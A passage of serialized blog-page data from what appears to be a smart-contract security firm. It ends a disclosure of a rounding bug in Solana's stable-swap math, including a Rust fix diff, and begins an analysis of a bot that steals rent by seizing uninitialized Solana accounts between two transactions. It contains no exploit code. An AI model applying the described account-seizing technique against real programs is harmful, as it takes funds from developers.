errors\n",{"type":24,"tag":301,"props":11367,"children":11368},{"class":303,"line":320},[11369,11374,11378,11382,11386,11391,11395,11400,11404],{"type":24,"tag":301,"props":11370,"children":11371},{"style":359},[11372],{"type":30,"value":11373}," dy_fee",{"type":24,"tag":301,"props":11375,"children":11376},{"style":385},[11377],{"type":30,"value":1679},{"type":24,"tag":301,"props":11379,"children":11380},{"style":10246},[11381],{"type":30,"value":11321},{"type":24,"tag":301,"props":11383,"children":11384},{"style":385},[11385],{"type":30,"value":2537},{"type":24,"tag":301,"props":11387,"children":11388},{"style":359},[11389],{"type":30,"value":11390}," dy ",{"type":24,"tag":301,"props":11392,"children":11393},{"style":385},[11394],{"type":30,"value":772},{"type":24,"tag":301,"props":11396,"children":11397},{"style":359},[11398],{"type":30,"value":11399}," self.fee ",{"type":24,"tag":301,"props":11401,"children":11402},{"style":385},[11403],{"type":30,"value":1036},{"type":24,"tag":301,"props":11405,"children":11406},{"style":359},[11407],{"type":30,"value":11408}," FEE_DENOMINATOR\n",{"type":24,"tag":32,"props":11410,"children":11411},{},[11412,11414,11421],{"type":30,"value":11413},"We originally thought this was an additional patch that didn't get ported over to Solana. However, it turns out this code was actually included in the ",{"type":24,"tag":188,"props":11415,"children":11418},{"href":11416,"rel":11417},"https://github.com/curvefi/curve-contract/commit/0fd801df7488d89f0e2fc81e760942d7858b01d6",[192],[11419],{"type":30,"value":11420},"original commit",{"type":30,"value":11422},", not as an additional security patch.",{"type":24,"tag":291,"props":11424,"children":11426},{"code":11425},"commit 0fd801df7488d89f0e2fc81e760942d7858b01d6\nAuthor: Ben Hauser \u003Cben@hauser.id>\nDate: Mon Aug 31 02:35:30 2020 +0300\n\n feat: add base pool without lending\n",[11427],{"type":24,"tag":145,"props":11428,"children":11429},{"__ignoreMap":7},[11430],{"type":30,"value":11425},{"type":24,"tag":32,"props":11432,"children":11433},{},[11434,11436,11443],{"type":30,"value":11435},"The commit adding stable swaps to SPL was ",{"type":24,"tag":188,"props":11437,"children":11440},{"href":11438,"rel":11439},"https://github.com/solana-labs/solana-program-library/commit/d62ddd2b94d5d2daaa97460b165d288610a87623",[192],[11441],{"type":30,"value":11442},"made a few months later",{"type":30,"value":11444},", meaning there was some disconnect when porting the code. Either the rounding was thought to be unnecesary, or it was simply forgotten.",{"type":24,"tag":291,"props":11446,"children":11448},{"code":11447},"commit d62ddd2b94d5d2daaa97460b165d288610a87623\nAuthor: Yuriy Savchenko \u003Cyuriy.savchenko@gmail.com>\nDate: Tue Nov 17 15:13:18 2020 +0200\n\n Added stable curve invariant to the token swap smart contract (#838)\n\n * Added stable curve invariant to the token swap smart contract\n\n * Fixed formatting\n\n * Added missing stable curve constraints\n\n * Symbol renames to make math clearer\n\n * Small refactoring according to PR comments, fixes for JS tests\n",[11449],{"type":24,"tag":145,"props":11450,"children":11451},{"__ignoreMap":7},[11452],{"type":30,"value":11447},{"type":24,"tag":32,"props":11454,"children":11455},{},[11456,11458,11465],{"type":30,"value":11457},"After contacting some other swap projects which were unaffected, we decided to notify the Solana team in order to get a patch upstreamed to ",{"type":24,"tag":188,"props":11459,"children":11462},{"href":11460,"rel":11461},"https://github.com/solana-labs/solana-program-library",[192],[11463],{"type":30,"value":11464},"the Solana Program Library",{"type":30,"value":206},{"type":24,"tag":32,"props":11467,"children":11468},{},[11469],{"type":30,"value":11470},"While few projects deploy the swap program from the Solana Program Library, the SPL program is meant as a reference implementation, and many exchanges fork their own code off of it.",{"type":24,"tag":32,"props":11472,"children":11473},{},[11474,11481],{"type":24,"tag":188,"props":11475,"children":11478},{"href":11476,"rel":11477},"https://github.com/joncinque",[192],[11479],{"type":30,"value":11480},"@joncinque",{"type":30,"value":11482}," helped triage this patch. We also asked him for his thoughts on a more complete solution.",{"type":24,"tag":9770,"props":11484,"children":11485},{},[11486],{"type":24,"tag":32,"props":11487,"children":11488},{},[11489],{"type":30,"value":11490},"Honestly, the idea of just subtracting 1 from the output will cover almost all situations correctly, so it's a good quick solution. I'll take a look to see if we can solve this for all situations through a correct application of checked_ceil_div, as with the constant product curve.",{"type":24,"tag":32,"props":11492,"children":11493},{},[11494,11496,11503,11505,11511],{"type":30,"value":11495},"After some thought, he helped ",{"type":24,"tag":188,"props":11497,"children":11500},{"href":11498,"rel":11499},"https://github.com/solana-labs/solana-program-library/pull/2942",[192],[11501],{"type":30,"value":11502},"introduce a PR",{"type":30,"value":11504}," which ceilings the computation in ",{"type":24,"tag":145,"props":11506,"children":11508},{"className":11507},[],[11509],{"type":30,"value":11510},"compute_new_destination_amount",{"type":30,"value":11512}," to correctly round within the stable curve math library.",{"type":24,"tag":291,"props":11514,"children":11516},{"code":11515,"language":9817,"meta":7,"className":9818,"style":7}," // Solve for y by approximating: y**2 + b*y = c\n let mut y_prev: U256;\n let mut y = d_val;\n for _ in 0..ITERATIONS {\n- y_prev = y;\n- y = (checked_u8_power(&y, 2)?.checked_add(c)?)\n- .checked_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n- if y == y_prev {\n+ let (y_new, _) = (checked_u8_power(&y, 2)?.checked_add(c)?)\n+ .checked_ceil_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n+ if y_new == y {\n break;\n+ } else {\n+ y = y_new;\n }\n",[11517],{"type":24,"tag":145,"props":11518,"children":11519},{"__ignoreMap":7},[11520,11528,11558,11585,11613,11637,11713,11817,11844,11939,12042,12069,12081,12100,12123],{"type":24,"tag":301,"props":11521,"children":11522},{"class":303,"line":304},[11523],{"type":24,"tag":301,"props":11524,"children":11525},{"style":1062},[11526],{"type":30,"value":11527}," // Solve for y by approximating: y**2 + b*y = c\n",{"type":24,"tag":301,"props":11529,"children":11530},{"class":303,"line":320},[11531,11536,11540,11545,11549,11554],{"type":24,"tag":301,"props":11532,"children":11533},{"style":348},[11534],{"type":30,"value":11535}," let",{"type":24,"tag":301,"props":11537,"children":11538},{"style":348},[11539],{"type":30,"value":9843},{"type":24,"tag":301,"props":11541,"children":11542},{"style":369},[11543],{"type":30,"value":11544}," y_prev",{"type":24,"tag":301,"props":11546,"children":11547},{"style":385},[11548],{"type":30,"value":1679},{"type":24,"tag":301,"props":11550,"children":11551},{"style":10246},[11552],{"type":30,"value":11553}," U256",{"type":24,"tag":301,"props":11555,"children":11556},{"style":359},[11557],{"type":30,"value":492},{"type":24,"tag":301,"props":11559,"children":11560},{"class":303,"line":335},[11561,11565,11569,11573,11577,11581],{"type":24,"tag":301,"props":11562,"children":11563},{"style":348},[11564],{"type":30,"value":11535},{"type":24,"tag":301,"props":11566,"children":11567},{"style":348},[11568],{"type":30,"value":9843},{"type":24,"tag":301,"props":11570,"children":11571},{"style":369},[11572],{"type":30,"value":9848},{"type":24,"tag":301,"props":11574,"children":11575},{"style":385},[11576],{"type":30,"value":2537},{"type":24,"tag":301,"props":11578,"children":11579},{"style":369},[11580],{"type":30,"value":9857},{"type":24,"tag":301,"props":11582,"children":11583},{"style":359},[11584],{"type":30,"value":492},{"type":24,"tag":301,"props":11586,"children":11587},{"class":303,"line":344},[11588,11593,11597,11601,11605,11609],{"type":24,"tag":301,"props":11589,"children":11590},{"style":308},[11591],{"type":30,"value":11592}," for",{"type":24,"tag":301,"props":11594,"children":11595},{"style":369},[11596],{"type":30,"value":9873},{"type":24,"tag":301,"props":11598,"children":11599},{"style":348},[11600],{"type":30,"value":9878},{"type":24,"tag":301,"props":11602,"children":11603},{"style":466},[11604],{"type":30,"value":685},{"type":24,"tag":301,"props":11606,"children":11607},{"style":385},[11608],{"type":30,"value":9887},{"type":24,"tag":301,"props":11610,"children":11611},{"style":359},[11612],{"type":30,"value":9892},{"type":24,"tag":301,"props":11614,"children":11615},{"class":303,"line":401},[11616,11620,11625,11629,11633],{"type":24,"tag":301,"props":11617,"children":11618},{"style":385},[11619],{"type":30,"value":9253},{"type":24,"tag":301,"props":11621,"children":11622},{"style":369},[11623],{"type":30,"value":11624}," y_prev",{"type":24,"tag":301,"props":11626,"children":11627},{"style":385},[11628],{"type":30,"value":2537},{"type":24,"tag":301,"props":11630,"children":11631},{"style":369},[11632],{"type":30,"value":9848},{"type":24,"tag":301,"props":11634,"children":11635},{"style":359},[11636],{"type":30,"value":492},{"type":24,"tag":301,"props":11638,"children":11639},{"class":303,"line":415},[11640,11644,11649,11653,11657,11661,11665,11669,11673,11677,11681,11685,11689,11693,11697,11701,11705,11709],{"type":24,"tag":301,"props":11641,"children":11642},{"style":385},[11643],{"type":30,"value":9253},{"type":24,"tag":301,"props":11645,"children":11646},{"style":369},[11647],{"type":30,"value":11648}," y",{"type":24,"tag":301,"props":11650,"children":11651},{"style":385},[11652],{"type":30,"value":2537},{"type":24,"tag":301,"props":11654,"children":11655},{"style":359},[11656],{"type":30,"value":873},{"type":24,"tag":301,"props":11658,"children":11659},{"style":314},[11660],{"type":30,"value":9935},{"type":24,"tag":301,"props":11662,"children":11663},{"style":359},[11664],{"type":30,"value":362},{"type":24,"tag":301,"props":11666,"children":11667},{"style":385},[11668],{"type":30,"value":556},{"type":24,"tag":301,"props":11670,"children":11671},{"style":369},[11672],{"type":30,"value":9948},{"type":24,"tag":301,"props":11674,"children":11675},{"style":359},[11676],{"type":30,"value":377},{"type":24,"tag":301,"props":11678,"children":11679},{"style":466},[11680],{"type":30,"value":1503},{"type":24,"tag":301,"props":11682,"children":11683},{"style":359},[11684],{"type":30,"value":9961},{"type":24,"tag":301,"props":11686,"children":11687},{"style":385},[11688],{"type":30,"value":9966},{"type":24,"tag":301,"props":11690,"children":11691},{"style":314},[11692],{"type":30,"value":9971},{"type":24,"tag":301,"props":11694,"children":11695},{"style":359},[11696],{"type":30,"value":362},{"type":24,"tag":301,"props":11698,"children":11699},{"style":369},[11700],{"type":30,"value":294},{"type":24,"tag":301,"props":11702,"children":11703},{"style":359},[11704],{"type":30,"value":9961},{"type":24,"tag":301,"props":11706,"children":11707},{"style":385},[11708],{"type":30,"value":2003},{"type":24,"tag":301,"props":11710,"children":11711},{"style":359},[11712],{"type":30,"value":791},{"type":24,"tag":301,"props":11714,"children":11715},{"class":303,"line":439},[11716,11720,11724,11729,11733,11737,11741,11745,11749,11753,11757,11761,11765,11769,11773,11777,11781,11785,11789,11793,11797,11801,11805,11809,11813],{"type":24,"tag":301,"props":11717,"children":11718},{"style":385},[11719],{"type":30,"value":9253},{"type":24,"tag":301,"props":11721,"children":11722},{"style":385},[11723],{"type":30,"value":9999},{"type":24,"tag":301,"props":11725,"children":11726},{"style":314},[11727],{"type":30,"value":11728},"checked_div",{"type":24,"tag":301,"props":11730,"children":11731},{"style":359},[11732],{"type":30,"value":362},{"type":24,"tag":301,"props":11734,"children":11735},{"style":314},[11736],{"type":30,"value":10013},{"type":24,"tag":301,"props":11738,"children":11739},{"style":359},[11740],{"type":30,"value":362},{"type":24,"tag":301,"props":11742,"children":11743},{"style":385},[11744],{"type":30,"value":556},{"type":24,"tag":301,"props":11746,"children":11747},{"style":369},[11748],{"type":30,"value":9948},{"type":24,"tag":301,"props":11750,"children":11751},{"style":359},[11752],{"type":30,"value":377},{"type":24,"tag":301,"props":11754,"children":11755},{"style":466},[11756],{"type":30,"value":1503},{"type":24,"tag":301,"props":11758,"children":11759},{"style":359},[11760],{"type":30,"value":9961},{"type":24,"tag":301,"props":11762,"children":11763},{"style":385},[11764],{"type":30,"value":9966},{"type":24,"tag":301,"props":11766,"children":11767},{"style":314},[11768],{"type":30,"value":9971},{"type":24,"tag":301,"props":11770,"children":11771},{"style":359},[11772],{"type":30,"value":362},{"type":24,"tag":301,"props":11774,"children":11775},{"style":369},[11776],{"type":30,"value":5613},{"type":24,"tag":301,"props":11778,"children":11779},{"style":359},[11780],{"type":30,"value":9961},{"type":24,"tag":301,"props":11782,"children":11783},{"style":385},[11784],{"type":30,"value":9966},{"type":24,"tag":301,"props":11786,"children":11787},{"style":314},[11788],{"type":30,"value":10066},{"type":24,"tag":301,"props":11790,"children":11791},{"style":359},[11792],{"type":30,"value":362},{"type":24,"tag":301,"props":11794,"children":11795},{"style":369},[11796],{"type":30,"value":10075},{"type":24,"tag":301,"props":11798,"children":11799},{"style":359},[11800],{"type":30,"value":9961},{"type":24,"tag":301,"props":11802,"children":11803},{"style":385},[11804],{"type":30,"value":2003},{"type":24,"tag":301,"props":11806,"children":11807},{"style":359},[11808],{"type":30,"value":9961},{"type":24,"tag":301,"props":11810,"children":11811},{"style":385},[11812],{"type":30,"value":2003},{"type":24,"tag":301,"props":11814,"children":11815},{"style":359},[11816],{"type":30,"value":492},{"type":24,"tag":301,"props":11818,"children":11819},{"class":303,"line":447},[11820,11824,11828,11832,11836,11840],{"type":24,"tag":301,"props":11821,"children":11822},{"style":385},[11823],{"type":30,"value":9253},{"type":24,"tag":301,"props":11825,"children":11826},{"style":308},[11827],{"type":30,"value":3285},{"type":24,"tag":301,"props":11829,"children":11830},{"style":369},[11831],{"type":30,"value":9848},{"type":24,"tag":301,"props":11833,"children":11834},{"style":385},[11835],{"type":30,"value":2460},{"type":24,"tag":301,"props":11837,"children":11838},{"style":369},[11839],{"type":30,"value":11544},{"type":24,"tag":301,"props":11841,"children":11842},{"style":359},[11843],{"type":30,"value":3035},{"type":24,"tag":301,"props":11845,"children":11846},{"class":303,"line":476},[11847,11851,11855,11859,11863,11867,11871,11875,11879,11883,11887,11891,11895,11899,11903,11907,11911,11915,11919,11923,11927,11931,11935],{"type":24,"tag":301,"props":11848,"children":11849},{"style":385},[11850],{"type":30,"value":11206},{"type":24,"tag":301,"props":11852,"children":11853},{"style":348},[11854],{"type":30,"value":9900},{"type":24,"tag":301,"props":11856,"children":11857},{"style":359},[11858],{"type":30,"value":873},{"type":24,"tag":301,"props":11860,"children":11861},{"style":369},[11862],{"type":30,"value":9909},{"type":24,"tag":301,"props":11864,"children":11865},{"style":359},[11866],{"type":30,"value":377},{"type":24,"tag":301,"props":11868,"children":11869},{"style":369},[11870],{"type":30,"value":9918},{"type":24,"tag":301,"props":11872,"children":11873},{"style":359},[11874],{"type":30,"value":911},{"type":24,"tag":301,"props":11876,"children":11877},{"style":385},[11878],{"type":30,"value":523},{"type":24,"tag":301,"props":11880,"children":11881},{"style":359},[11882],{"type":30,"value":873},{"type":24,"tag":301,"props":11884,"children":11885},{"style":314},[11886],{"type":30,"value":9935},{"type":24,"tag":301,"props":11888,"children":11889},{"style":359},[11890],{"type":30,"value":362},{"type":24,"tag":301,"props":11892,"children":11893},{"style":385},[11894],{"type":30,"value":556},{"type":24,"tag":301,"props":11896,"children":11897},{"style":369},[11898],{"type":30,"value":9948},{"type":24,"tag":301,"props":11900,"children":11901},{"style":359},[11902],{"type":30,"value":377},{"type":24,"tag":301,"props":11904,"children":11905},{"style":466},[11906],{"type":30,"value":1503},{"type":24,"tag":301,"props":11908,"children":11909},{"style":359},[11910],{"type":30,"value":9961},{"type":24,"tag":301,"props":11912,"children":11913},{"style":385},[11914],{"type":30,"value":9966},{"type":24,"tag":301,"props":11916,"children":11917},{"style":314},[11918],{"type":30,"value":9971},{"type":24,"tag":301,"props":11920,"children":11921},{"style":359},[11922],{"type":30,"value":362},{"type":24,"tag":301,"props":11924,"children":11925},{"style":369},[11926],{"type":30,"value":294},{"type":24,"tag":301,"props":11928,"children":11929},{"style":359},[11930],{"type":30,"value":9961},{"type":24,"tag":301,"props":11932,"children":11933},{"style":385},[11934],{"type":30,"value":2003},{"type":24,"tag":301,"props":11936,"children":11937},{"style":359},[11938],{"type":30,"value":791},{"type":24,"tag":301,"props":11940,"children":11941},{"class":303,"line":495},[11942,11946,11950,11954,11958,11962,11966,11970,11974,11978,11982,11986,11990,11994,11998,12002,12006,12010,12014,12018,12022,12026,12030,12034,12038],{"type":24,"tag":301,"props":11943,"children":11944},{"style":385},[11945],{"type":30,"value":11206},{"type":24,"tag":301,"props":11947,"children":11948},{"style":385},[11949],{"type":30,"value":9999},{"type":24,"tag":301,"props":11951,"children":11952},{"style":314},[11953],{"type":30,"value":10004},{"type":24,"tag":301,"props":11955,"children":11956},{"style":359},[11957],{"type":30,"value":362},{"type":24,"tag":301,"props":11959,"children":11960},{"style":314},[11961],{"type":30,"value":10013},{"type":24,"tag":301,"props":11963,"children":11964},{"style":359},[11965],{"type":30,"value":362},{"type":24,"tag":301,"props":11967,"children":11968},{"style":385},[11969],{"type":30,"value":556},{"type":24,"tag":301,"props":11971,"children":11972},{"style":369},[11973],{"type":30,"value":9948},{"type":24,"tag":301,"props":11975,"children":11976},{"style":359},[11977],{"type":30,"value":377},{"type":24,"tag":301,"props":11979,"children":11980},{"style":466},[11981],{"type":30,"value":1503},{"type":24,"tag":301,"props":11983,"children":11984},{"style":359},[11985],{"type":30,"value":9961},{"type":24,"tag":301,"props":11987,"children":11988},{"style":385},[11989],{"type":30,"value":9966},{"type":24,"tag":301,"props":11991,"children":11992},{"style":314},[11993],{"type":30,"value":9971},{"type":24,"tag":301,"props":11995,"children":11996},{"style":359},[11997],{"type":30,"value":362},{"type":24,"tag":301,"props":11999,"children":12000},{"style":369},[12001],{"type":30,"value":5613},{"type":24,"tag":301,"props":12003,"children":12004},{"style":359},[12005],{"type":30,"value":9961},{"type":24,"tag":301,"props":12007,"children":12008},{"style":385},[12009],{"type":30,"value":9966},{"type":24,"tag":301,"props":12011,"children":12012},{"style":314},[12013],{"type":30,"value":10066},{"type":24,"tag":301,"props":12015,"children":12016},{"style":359},[12017],{"type":30,"value":362},{"type":24,"tag":301,"props":12019,"children":12020},{"style":369},[12021],{"type":30,"value":10075},{"type":24,"tag":301,"props":12023,"children":12024},{"style":359},[12025],{"type":30,"value":9961},{"type":24,"tag":301,"props":12027,"children":12028},{"style":385},[12029],{"type":30,"value":2003},{"type":24,"tag":301,"props":12031,"children":12032},{"style":359},[12033],{"type":30,"value":9961},{"type":24,"tag":301,"props":12035,"children":12036},{"style":385},[12037],{"type":30,"value":2003},{"type":24,"tag":301,"props":12039,"children":12040},{"style":359},[12041],{"type":30,"value":492},{"type":24,"tag":301,"props":12043,"children":12044},{"class":303,"line":504},[12045,12049,12053,12057,12061,12065],{"type":24,"tag":301,"props":12046,"children":12047},{"style":385},[12048],{"type":30,"value":11206},{"type":24,"tag":301,"props":12050,"children":12051},{"style":308},[12052],{"type":30,"value":3285},{"type":24,"tag":301,"props":12054,"children":12055},{"style":369},[12056],{"type":30,"value":10107},{"type":24,"tag":301,"props":12058,"children":12059},{"style":385},[12060],{"type":30,"value":2460},{"type":24,"tag":301,"props":12062,"children":12063},{"style":369},[12064],{"type":30,"value":9848},{"type":24,"tag":301,"props":12066,"children":12067},{"style":359},[12068],{"type":30,"value":3035},{"type":24,"tag":301,"props":12070,"children":12071},{"class":303,"line":512},[12072,12077],{"type":24,"tag":301,"props":12073,"children":12074},{"style":308},[12075],{"type":30,"value":12076}," break",{"type":24,"tag":301,"props":12078,"children":12079},{"style":359},[12080],{"type":30,"value":492},{"type":24,"tag":301,"props":12082,"children":12083},{"class":303,"line":592},[12084,12088,12092,12096],{"type":24,"tag":301,"props":12085,"children":12086},{"style":385},[12087],{"type":30,"value":11206},{"type":24,"tag":301,"props":12089,"children":12090},{"style":359},[12091],{"type":30,"value":10139},{"type":24,"tag":301,"props":12093,"children":12094},{"style":308},[12095],{"type":30,"value":10144},{"type":24,"tag":301,"props":12097,"children":12098},{"style":359},[12099],{"type":30,"value":3035},{"type":24,"tag":301,"props":12101,"children":12102},{"class":303,"line":619},[12103,12107,12111,12115,12119],{"type":24,"tag":301,"props":12104,"children":12105},{"style":385},[12106],{"type":30,"value":11206},{"type":24,"tag":301,"props":12108,"children":12109},{"style":369},[12110],{"type":30,"value":10156},{"type":24,"tag":301,"props":12112,"children":12113},{"style":385},[12114],{"type":30,"value":2537},{"type":24,"tag":301,"props":12116,"children":12117},{"style":369},[12118],{"type":30,"value":10107},{"type":24,"tag":301,"props":12120,"children":12121},{"style":359},[12122],{"type":30,"value":492},{"type":24,"tag":301,"props":12124,"children":12125},{"class":303,"line":635},[12126],{"type":24,"tag":301,"props":12127,"children":12128},{"style":359},[12129],{"type":30,"value":12130}," }\n",{"type":24,"tag":43,"props":12132,"children":12134},{"id":12133},"closing-thoughts",[12135],{"type":30,"value":12136},"Closing Thoughts",{"type":24,"tag":32,"props":12138,"children":12139},{},[12140],{"type":30,"value":12141},"This is a good example of how messing around and interacting with the ecosystem can lead to unexpected bugs. We found this, not as a result of active security research, but as part of our work in MEV and trading.",{"type":24,"tag":32,"props":12143,"children":12144},{},[12145,12147,12152],{"type":30,"value":12146},"Another interesting takeaway is that ",{"type":24,"tag":60,"props":12148,"children":12149},{},[12150],{"type":30,"value":12151},"fuzzing can give a false sense of security",{"type":30,"value":12153},". Prior to our report, Saber had already deployed comprehensive fuzzers for their swap implementation. A researcher looking at code coverage alone might come to the incorrect conclusion that such extensively fuzzed code couldn't possibly have a vulnerability.",{"type":24,"tag":32,"props":12155,"children":12156},{},[12157,12159,12166],{"type":30,"value":12158},"One can see parallels to traditional security, as with Google Project Zero's ",{"type":24,"tag":188,"props":12160,"children":12163},{"href":12161,"rel":12162},"https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html",[192],[12164],{"type":30,"value":12165},"port-mortem of the NSS overflow",{"type":30,"value":206},{"type":24,"tag":32,"props":12168,"children":12169},{},[12170],{"type":24,"tag":177,"props":12171,"children":12173},{"alt":7,"src":12172},"/posts/spl-swap/p0.png",[],{"type":24,"tag":32,"props":12175,"children":12176},{},[12177],{"type":30,"value":12178},"A heavily fuzzed method had a trivial buffer overflow due to an arbitrary size limit on the input data. Implict assumptions can often undermine security.",{"type":24,"tag":32,"props":12180,"children":12181},{},[12182],{"type":30,"value":12183},"Especially with regard to onchain programs, it's important to consider what actually is a \"vulnerability\". Getting tokens from nothing is a more obvious example, but more subtle bugs can arise with increasingly complex defi interactions. Economic invariants are much harder to detect than say, memory corruption.",{"type":24,"tag":32,"props":12185,"children":12186},{},[12187],{"type":30,"value":12188},"A comprehensive evaluation of smart contracts relies on a deep understanding of economic implications within the Solana ecosystem.",{"type":24,"tag":9672,"props":12190,"children":12191},{},[12192],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":12194},[12195,12196,12197,12198],{"id":9755,"depth":320,"text":9758},{"id":10746,"depth":320,"text":10749},{"id":11051,"depth":320,"text":11054},{"id":12133,"depth":320,"text":12136},"content:blog:2022-04-26-spl-swap-rounding.md","blog/2022-04-26-spl-swap-rounding.md","blog/2022-04-26-spl-swap-rounding",{"_path":12203,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":12204,"description":12205,"image":12206,"date":12210,"isFeatured":16,"onBlogPage":16,"tags":12211,"body":12212,"_type":9700,"_id":12533,"_source":9702,"_file":12534,"_stem":12535,"_extension":9705},"/blog/2022-08-19-solend-rent-thief","The Story of the Curious Rent Thief","A tale of pickpockets preying on the Solana ecosystem. Read our investigation into the persistent theft of rent from uninitialized accounts. This is the story of the Solend rent thief.",{"src":12207,"width":12208,"height":12209},"/posts/rent-thief/title.jpg",970,826,"2022-08-19",[9717,9718],{"type":21,"children":12213,"toc":12526},[12214,12219,12225,12230,12235,12240,12244,12257,12304,12334,12343,12348,12353,12358,12364,12377,12393,12398,12403,12418,12422,12427,12442,12449,12454,12464,12471,12475,12480,12486,12491,12496,12501,12507,12512],{"type":24,"tag":32,"props":12215,"children":12216},{},[12217],{"type":30,"value":12218},"Recently, there’s been a rent thief. This bot steals money from uninitialized accounts across the Solana ecosystem, claiming and profiting from the rent. The Solend team noticed the bot when it attempted an attack on the new permissionless pools that are being developed (to be clear, funds stored in the main Solend protocol are completely unaffected). Let's dig into how rent thieving works by doing a case study on an attack to one of the permissionless pools.",{"type":24,"tag":43,"props":12220,"children":12222},{"id":12221},"background",[12223],{"type":30,"value":12224},"Background",{"type":24,"tag":32,"props":12226,"children":12227},{},[12228],{"type":30,"value":12229},"To understand how this exploit works, we first have to understand a bit about how rent works in Solana.",{"type":24,"tag":32,"props":12231,"children":12232},{},[12233],{"type":30,"value":12234},"Since accounts can store data that every validator needs to download, Solana charges a certain amount of rent based on the amount of data. However, accounts that have enough for 2 years of rent payments are considered rent-exempt as long as their balance never drops below the threshold. Fortunately, rent is very cheap, so it's not hard to make an account rent-exempt.",{"type":24,"tag":32,"props":12236,"children":12237},{},[12238],{"type":30,"value":12239},"As such, when creating new accounts, most programs will need to transfer some SOL into the new account to make it rent-exempt.",{"type":24,"tag":43,"props":12241,"children":12242},{"id":2746},[12243],{"type":30,"value":2749},{"type":24,"tag":32,"props":12245,"children":12246},{},[12247,12249,12255],{"type":30,"value":12248},"New reserves (also known as assets) are added to a Solend pool by calling the ",{"type":24,"tag":145,"props":12250,"children":12252},{"className":12251},[],[12253],{"type":30,"value":12254},"init_reserve",{"type":30,"value":12256}," function, which creates 6 new accounts to store data about the reserve:",{"type":24,"tag":6246,"props":12258,"children":12259},{},[12260,12265,12270,12275,12286,12291],{"type":24,"tag":2659,"props":12261,"children":12262},{},[12263],{"type":30,"value":12264},"reserve detail - stores information about the reserve e.g liquidity mint, mint decimals, oracles, configs, etc.",{"type":24,"tag":2659,"props":12266,"children":12267},{},[12268],{"type":30,"value":12269},"reserve liquidity token account - holds deposited tokens",{"type":24,"tag":2659,"props":12271,"children":12272},{},[12273],{"type":30,"value":12274},"fee receiver token account - account which will receive origination fees on borrows",{"type":24,"tag":2659,"props":12276,"children":12277},{},[12278,12280],{"type":30,"value":12279},"reserve collateral mint account - deposit receipt token, also known as ",{"type":24,"tag":145,"props":12281,"children":12283},{"className":12282},[],[12284],{"type":30,"value":12285},"cTokens",{"type":24,"tag":2659,"props":12287,"children":12288},{},[12289],{"type":30,"value":12290},"reserve collateral token account - holds users' collateral tokens",{"type":24,"tag":2659,"props":12292,"children":12293},{},[12294,12296,12302],{"type":30,"value":12295},"creator collateral token account - creator's ",{"type":24,"tag":145,"props":12297,"children":12299},{"className":12298},[],[12300],{"type":30,"value":12301},"cToken",{"type":30,"value":12303}," account",{"type":24,"tag":32,"props":12305,"children":12306},{},[12307,12309,12314,12316,12321,12322,12327,12329],{"type":30,"value":12308},"Account creation and initialization are ",{"type":24,"tag":5422,"props":12310,"children":12311},{},[12312],{"type":30,"value":12313},"usually",{"type":30,"value":12315}," done within the same transactions. However, due to Solana's transaction size limit of 1232 bytes, the creation and initialization of these 6 accounts had to be separated into 2 transactions, creation and initialization. Here's what a call to ",{"type":24,"tag":145,"props":12317,"children":12319},{"className":12318},[],[12320],{"type":30,"value":12254},{"type":30,"value":5945},{"type":24,"tag":5422,"props":12323,"children":12324},{},[12325],{"type":30,"value":12326},"supposed",{"type":30,"value":12328}," to look like:\n",{"type":24,"tag":177,"props":12330,"children":12333},{"src":12331,"alt":12332},"/posts/rent-thief/transacdiagram.png","drawing",[],{"type":24,"tag":32,"props":12335,"children":12336},{},[12337,12339],{"type":30,"value":12338},"Notice anything amiss? In between the two transactions, the account has rent money but no owner. This is where the rent thief comes in to snatch the account, along with its rent:\n",{"type":24,"tag":177,"props":12340,"children":12342},{"src":12341,"alt":12332},"/posts/rent-thief/attacktransac.png",[],{"type":24,"tag":32,"props":12344,"children":12345},{},[12346],{"type":30,"value":12347},"Since there was a roughly 40 second (50 slot) window in between the two transactions, such an attack was very consistent.",{"type":24,"tag":32,"props":12349,"children":12350},{},[12351],{"type":30,"value":12352},"Fortunately, rent is relatively cheap so the entire attack only extracts about 0.0082 SOL every iteration (4 token accounts each worth around 0.002 SOL), which is around 28 cents at the time of writing this article.",{"type":24,"tag":32,"props":12354,"children":12355},{},[12356],{"type":30,"value":12357},"Despite this lost cost, this is pretty annoying...",{"type":24,"tag":43,"props":12359,"children":12361},{"id":12360},"example",[12362],{"type":30,"value":12363},"Example",{"type":24,"tag":32,"props":12365,"children":12366},{},[12367,12369,12376],{"type":30,"value":12368},"Let's take a look at ",{"type":24,"tag":188,"props":12370,"children":12373},{"href":12371,"rel":12372},"https://explorer.solana.com/address/2PUTo74Vbt9fXVoTywjTFZNnWGckWS98HnruXvZJaj4N",[192],[12374],{"type":30,"value":12375},"a real attack",{"type":30,"value":206},{"type":24,"tag":32,"props":12378,"children":12379},{},[12380,12387,12389],{"type":24,"tag":188,"props":12381,"children":12384},{"href":12382,"rel":12383},"https://explorer.solana.com/tx/9yon9Av2sBq78bZ92Pa28p8gef5MUEQL3sBLGVzxK3RNGYsN2nLnTrbqS1wMCvJdinKE8CC9SwCuUYuNBwrNFNy",[192],[12385],{"type":30,"value":12386},"Transaction 1",{"type":30,"value":12388},":\n",{"type":24,"tag":177,"props":12390,"children":12392},{"alt":7,"src":12391},"https://i.imgur.com/xJvIwgc.png",[],{"type":24,"tag":32,"props":12394,"children":12395},{},[12396],{"type":30,"value":12397},"(...more accounts truncated)",{"type":24,"tag":32,"props":12399,"children":12400},{},[12401],{"type":30,"value":12402},"The developer creates a couple accounts and transfers enough SOL for them to be rent-exempt. This took place in slot 136,580,113.",{"type":24,"tag":32,"props":12404,"children":12405},{},[12406,12413,12414],{"type":24,"tag":188,"props":12407,"children":12410},{"href":12408,"rel":12409},"https://explorer.solana.com/tx/22beQSDReFGK4KAgarAz4MbibpxaFHiARd3yaCDZ4wmKSNoTcxmKMp6uRNA2CY4xAAZVZZCDg522aJ7jXftyhtSE",[192],[12411],{"type":30,"value":12412},"Attacker's Transaction",{"type":30,"value":12388},{"type":24,"tag":177,"props":12415,"children":12417},{"alt":7,"src":12416},"https://i.imgur.com/CpSKuL3.png",[],{"type":24,"tag":32,"props":12419,"children":12420},{},[12421],{"type":30,"value":12397},{"type":24,"tag":32,"props":12423,"children":12424},{},[12425],{"type":30,"value":12426},"As detailed before, the attacker takes ownership of the newly created accounts. This took place in slot 